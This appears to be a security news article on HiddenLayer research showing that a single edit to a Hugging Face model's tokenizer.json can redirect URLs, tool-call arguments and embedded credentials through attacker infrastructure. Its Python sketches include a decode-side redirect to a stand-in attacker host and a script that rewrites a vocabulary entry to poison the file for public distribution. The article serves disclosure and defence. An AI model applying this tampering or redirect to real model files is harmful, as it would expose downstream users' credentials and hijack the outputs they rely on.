
Hugging Face Packages Weaponized With a Single File Tweak

Why This Matters

A vulnerability in Hugging Face's tokenizer layer lets attackers intercept sensitive data and manipulate model outputs, highlighting the importance of securing local AI model deployments. Open source AI platforms, and locally run models in particular, need stronger security measures to protect user data and maintain trust in AI tools.

Key Takeaways

Hugging Face, an open source hub for AI models and components, is exposed to an attack via the "tokenizer" layer that AI models use to make their outputs human-readable.

A cyberattacker could use the threat vector to mount a man-in-the-middle (MitM) attack in which a modified .json file intercepts tool-call arguments and redirects URL tokens through attacker infrastructure. This gives the threat actor "visibility into every URL the model accesses, API parameters, and any credentials embedded in those requests," HiddenLayer security researcher Divyanshu Divyanshu explained in a blog post released today. A simplified sketch of the mechanism follows.
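This minimal Python sketch uses invented token IDs, strings, and domains; it is not HiddenLayer's exploit code, only an illustration of how a single remapped decoding entry can reroute a URL after the model has finished generating:

```python
# Invented vocabulary and IDs, purely to illustrate the decode-side remap.
legit_vocab = {
    101: "GET ",
    202: "https://",
    303: "api.example.com",
    404: "/v1/data?key=SECRET",
}

# The attacker changes exactly one entry in the decoding table:
tampered_vocab = dict(legit_vocab)
tampered_vocab[303] = "attacker-proxy.example"

model_output_ids = [101, 202, 303, 404]  # what the model actually generated

def decode(vocab, ids):
    """Mimic the tokenizer's decode step: look up each ID, join the strings."""
    return "".join(vocab[i] for i in ids)

print(decode(legit_vocab, model_output_ids))
# -> GET https://api.example.com/v1/data?key=SECRET
print(decode(tampered_vocab, model_output_ids))
# -> GET https://attacker-proxy.example/v1/data?key=SECRET
# The request (credentials included) now routes through the attacker's
# server, while the model's internal computation is entirely unchanged.
```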

HiddenLayer tested its attack on Hugging Face models run locally using the SafeTensors, ONNX, and GGUF formats. SafeTensors is a file format created by Hugging Face and is considered the de facto standard on the platform; all three formats are supported by Hugging Face, and all three are popular for a variety of use cases. That said, this is a problem that could impact any platform used for running open source models, such as LlamaCPP and Ollama.


The attack also affects only models run locally, as it relies on modifying local files. Models run through Hugging Face's Inference API, for example, are not impacted.

Hugging Face did not respond to a request for comment.

AI Tokenizer Flaw Lets Attackers Hijack Model Outputs

A tokenizer is a kind of translator between human language and computer language for AI models. A model's output starts as a sequence of integer IDs that is decoded through the tokenizer before the output reaches the user. In many of its models, Hugging Face uses a tokenizer library file named "tokenizer.json" as the mapping for this decoding process. Each entry in this file pairs a string with an ID that can represent a word, subword fragment, or control token, and these libraries can include tens of thousands of entries. As HiddenLayer discovered, if an attacker tampers with this "tokenizer.json" file, even a single edit is enough to take direct control of anything the model outputs, and possibly to gain a foothold on the user's device.
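For readers who want to see what that mapping looks like on disk, here is a minimal sketch. It assumes the BPE-style tokenizer.json layout that many Hugging Face models ship with; the file path is illustrative, as the file normally sits alongside the model weights.

```python
import json

# Load a model's tokenizer.json and inspect the table that drives decoding.
with open("tokenizer.json") as f:
    spec = json.load(f)

vocab = spec["model"]["vocab"]             # token string -> integer ID
print(f"{len(vocab)} vocabulary entries")  # often tens of thousands

# Decoding inverts the table: the model emits integer IDs, and each one is
# looked up here before any text reaches the user.
id_to_token = {i: s for s, i in vocab.items()}

def naive_decode(ids):
    # Real tokenizers also handle merges, byte-level escapes, and special
    # tokens; this toy version shows only the lookup that matters here.
    return "".join(id_to_token[i] for i in ids)
```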

The most likely way an attacker would use this in the wild is by taking an open source model, editing the tokenizer file, and then uploading the poisoned model to a public repository, thus distributing it to every downstream user who pulls it. "A tampered tokenizer.json is structurally identical to a legitimate one, so it passes through the normal model distribution pipeline without any special delivery mechanism," Divyanshu wrote. A hypothetical version of that tampering step is sketched below.
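In this sketch the token string and file path are invented, and a real vocabulary would typically split a domain into subword fragments rather than store it whole, but the single-edit principle is the same:

```python
import json

# Hypothetical tampering sketch: one edit to an otherwise valid
# tokenizer.json, using the same BPE-style layout as above.
with open("tokenizer.json") as f:
    spec = json.load(f)

vocab = spec["model"]["vocab"]            # token string -> integer ID

# Re-key a single entry. The ID stays the same, so every time the model
# emits that ID, the decoder now produces the attacker's string instead.
token_id = vocab.pop("api.example.com")   # assumed to exist for the sketch
vocab["attacker-proxy.example"] = token_id

# The result is still schema-valid JSON of roughly the same size, which is
# why it passes through the normal model distribution pipeline unflagged.
with open("tokenizer.json", "w") as f:
    json.dump(spec, f)
```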

